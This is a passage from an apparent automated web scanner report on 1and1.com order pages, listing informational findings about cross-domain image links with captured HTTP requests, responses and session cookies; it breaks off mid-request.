Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=taV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykeJWx1Oy4vKyovLCoqKSclJyo=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:26:AAABLtRlgbZ6_eg4OG2LZboWFQTS2jli:1300643545526; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:52:06 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Sal8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCofJlZ2PC8wLCswLSsrKigmKCs=; Expires=Fri, 07-Apr-2079 21:06:13 GMT; Path=/
ETag: d9cfb4af92e44225f0ad2cca48eb1ca6
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 18209


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<span class="container"><img class="price-graphic alphapng" width="114" height="73" src="//img.1und1.de/OdinPrice/blue/xl/dollar/6/99/none/month.png" alt="6.99 &#8364;/month*"></span>
...[SNIP]...
</div><img class="price-graphic alphapng" width="114" height="73" src="//img.1und1.de/OdinPrice/blue/xl/dollar/4/99/none/month.png" alt="4.99 &#8364;/month*"></span>
...[SNIP]...

4.9. http://order.1and1.com/xml/order/MailInstantMail

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/MailInstantMail

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following link to another domain:

Request

GET /xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:24:29 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=4a2AwMzQqU1NTTWBWdDpybDkrNW5hWzNKPTcfIyAgHx0fHRoxNDMtMDQnKSgnJEk3Y1haaCAiHU0mUHY8LzAsKzAsKi0rJS0kIyxkZSsgJ1dgPTAxLSwxLisuKSwtJic=; Expires=Fri, 07-Apr-2079 21:38:36 GMT; Path=/
ETag: 5bfc66b9517d399c2c12a418498321d1
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 25381


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="67" height="44" src="//img.1und1.de/OdinPrice/white/m/dollar/0/99/none/none.png" alt="$ 0.99"><span class="text-bottom">
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="67" height="44" src="//img.1und1.de/OdinPrice/white/m/dollar/0/99/none/none.png" alt="$ 0.99"><span class="text-bottom">
...[SNIP]...

4.10. http://order.1and1.com/xml/order/MailXchange

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/MailXchange

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following link to another domain:

Request

GET /xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.ecommerce HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:24:45 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=ra2AwMzQqU1NTTWBWdDpybDkrNW5hWzNKPTcfIyAgHx0fHRoxNDMtMDQnKSgnJEk3Y1haaCAiHU0mUHY8LzAsKzAsKi0rJS0kIyxkZSsgJ1dgPTAxLSwxLisuKSwtJic=; Expires=Fri, 07-Apr-2079 21:38:52 GMT; Path=/
ETag: 80d79fb7f81c76e6606c17b109cfe0c5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 24474


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<span class="container"><img class="price-graphic alphapng" id="costs-monthly-total-img" width="69" height="46" src="//img.1und1.de/OdinPrice/blue/m/dollar/0/00/none/month.png" alt="from 0,00 &#8364;/month*"></span>
...[SNIP]...

4.11. http://order.1and1.com/xml/order/MicrosoftExchange

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/MicrosoftExchange

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following link to another domain:

Request

GET /xml/order/MicrosoftExchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.mail HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:25:20 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=uaF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigdO2t0Oi0uKikuKygrJikqIyQ=; Expires=Fri, 07-Apr-2079 21:39:27 GMT; Path=/
ETag: 99e72a9f4366afaae938dfca2d6367b6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 26758


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</span><img class="price-graphic alphapng" width="67" height="44" src="//img.1und1.de/OdinPrice/white/m/dollar/6/99/none/none.png" alt="only $ 6.99 per month"><span class="text-bottom">
...[SNIP]...
</span><img class="price-graphic alphapng" width="67" height="44" src="//img.1und1.de/OdinPrice/white/m/dollar/6/99/none/none.png" alt="only $ 6.99 per month"><span class="text-bottom">
...[SNIP]...

4.12. http://order.1and1.com/xml/order/MsHosting

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/MsHosting

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /xml/order/MsHosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=; emos1und1d1_jcsid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k22HCyrc0S5Ck_gLCqZigiV2:1300632671085; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1300632671085:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:55:42 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=kcmc3OjsxWlpaVGddZCpiXCkbJXVoYjpRRD4mKicnJiQmJCEhJCMdICQXMC8uK1A+al9hbycpJFQtV2YsHyAcGyAzMTQyLDQrKjNrbDIlLl5nLSAhHRwhHTI1My01LCs=; Expires=Fri, 07-Apr-2079 18:09:49 GMT; Path=/
ETag: b67acb7c15edd14e68367a76bb0bfc39
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 59574


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="69" height="44" src="//img.1und1.de/OdinPrice/white/m/dollar/3/99/none/month.png" alt="ab 3.99 &#8364;/Monat*"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00/month"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00/month"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00/month"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="69" height="44" src="//img.1und1.de/OdinPrice/white/m/dollar/3/99/none/month.png" alt="ab 3.99 &#8364;/Monat*"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00/month"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00/month"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00/month"><span class="itable-price-text-below-offer">
...[SNIP]...

4.13. http://order.1and1.com/xml/order/Server

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Server

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.server HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:33:35 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=vZ1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; Expires=Fri, 07-Apr-2079 21:47:42 GMT; Path=/
ETag: 1e80e3a593b677388759f6eb9a792645
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20244


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<span class="container"><img class="price-graphic alphapng" width="123" height="83" src="//img.1und1.de/OdinPrice/yellow/xl/dollar/0/00/none/month-star.png" alt="ab 0.00 &#8364;/Monat*"><span class="horz-l-price-text offer">
...[SNIP]...
<span class="container"><img class="price-graphic alphapng" width="121" height="83" src="//img.1und1.de/OdinPrice/blue/xl/dollar/0/00/none/month-star.png" alt="0.00 &#8364;/month*"><span class="horz-l-price-text offer">
...[SNIP]...
<span class="container"><img class="price-graphic alphapng" width="121" height="83" src="//img.1und1.de/OdinPrice/blue/xl/dollar/0/00/none/month-star.png" alt="0.00 &#8364;/month*"><span class="horz-l-price-text offer">
...[SNIP]...

4.14. http://order.1and1.com/xml/order/ServerPremium

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/ServerPremium

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:33:36 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=6aV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykeJWx1Oy4vKyovLCksJyorJCU=; Expires=Fri, 07-Apr-2079 21:47:43 GMT; Path=/
ETag: 4ad2d8e7cdb21186fe994e75ac91e0f5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 32407


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/blue/m/dollar/0/00/none/month-star.png" alt="starting at 0.00 /month*"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="91" height="44" src="//img.1und1.de/OdinPrice/blue/m/dollar/59/99/none/month.png" alt="$59.99 /month*"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="91" height="44" src="//img.1und1.de/OdinPrice/blue/m/dollar/99/99/none/month.png" alt="$99.99 /month*"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="113" height="44" src="//img.1und1.de/OdinPrice/blue/m/dollar/149/99/none/month.png" alt="$149.99 /month*"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/blue/m/dollar/0/00/none/month-star.png" alt="from 0.00 &#8364;/month*"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/blue/m/dollar/0/00/none/month-star.png" alt="from 0.00 &#8364;/month*"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/blue/m/dollar/0/00/none/month-star.png" alt="from 0.00 &#8364;/month*"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="113" height="44" src="//img.1und1.de/OdinPrice/blue/m/dollar/499/99/none/month.png" alt="$499.99 /month*"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="113" height="44" src="//img.1und1.de/OdinPrice/blue/m/dollar/699/99/none/month.png" alt="$699.99 /month*"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="113" height="44" src="//img.1und1.de/OdinPrice/blue/m/dollar/999/99/none/month.png" alt="$999.99 /month*"></span>
...[SNIP]...

4.15. http://order.1and1.com/xml/order/Sharepoint

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Sharepoint

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.sharepoint HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:34:33 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; Expires=Fri, 07-Apr-2079 21:48:40 GMT; Path=/
ETag: 5de0f14c7355940110db8a760b729cda
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 25629


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</span><img class="price-graphic alphapng" width="89" height="44" src="//img.1und1.de/OdinPrice/white/m/dollar/19/99/none/none.png" alt="only $ 19.99 per month"><span class="text-bottom">
...[SNIP]...
</span><img class="price-graphic alphapng" width="89" height="44" src="//img.1und1.de/OdinPrice/white/m/dollar/19/99/none/none.png" alt="only $ 19.99 per month"><span class="text-bottom">
...[SNIP]...

4.16. http://order.1and1.com/xml/order/VirtualServer

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServer

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&linkOrigin=CloudDynamicServer&linkId=hd.tab.vps HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=CloudDynamicServer; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=YZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:30:AAABLtRnZNPcSJFdN9f55FNyE*t5Qv64:1300643669203; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:54:16 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=yZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; Expires=Fri, 07-Apr-2079 21:08:23 GMT; Path=/
ETag: dd3a6908188586141eb93efcd06408c1
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 25297


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/blue/m/dollar/0/00/none/month-star.png" alt="starting at 0.00 /month*"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="90" height="44" src="//img.1und1.de/OdinPrice/blue/m/dollar/29/00/none/month-star.png" alt="starting at $29.00 /month*"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/blue/m/dollar/0/00/none/month-star.png" alt="$0.00"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/blue/m/dollar/0/00/none/month-star.png" alt="$0.00"></span>
...[SNIP]...

4.17. http://order.1and1.com/xml/order/VirtualServerL

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServerL

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /xml/order/VirtualServerL;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&ordernow=true HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
